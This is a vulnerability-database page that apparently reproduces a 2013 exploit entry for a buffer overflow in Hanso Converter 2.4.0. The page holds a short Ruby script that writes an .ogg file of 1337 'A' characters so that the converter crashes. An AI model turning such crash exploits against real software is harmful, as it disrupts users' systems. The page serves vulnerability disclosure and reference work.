Lucene search
K

Hanso Converter 2.4.0 - ogg Buffer Overflow (Denial of Service)

🗓️ 12 Nov 2013 00:00:00Reported by Necmettin COSKUNType 
exploitpack
 exploitpack
👁 7 Views

Hanso Converter 2.4.0 Buffer Overflow (Denial Of Service) exploi

Code
#!/usr/bin/env ruby
# coding:UTF-8
# Exploit Title:Hanso Converter 2.4.0 Buffer Overflow(DoS)
# Author:Necmettin COSKUN => twitter.com/babayarisi
# Vendor :www.hansotools.com
# Software link:http://www.hansotools.com/downloads/hanso-converter-setup.exe
# version: 2.4.0
# Tested on: windows XP sp2

DENEME = "A" * 1337

File.open('hanzo.ogg', 'w') do |bofdosya|  
bofdosya.puts (DENEME)
bofdosya.close()
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation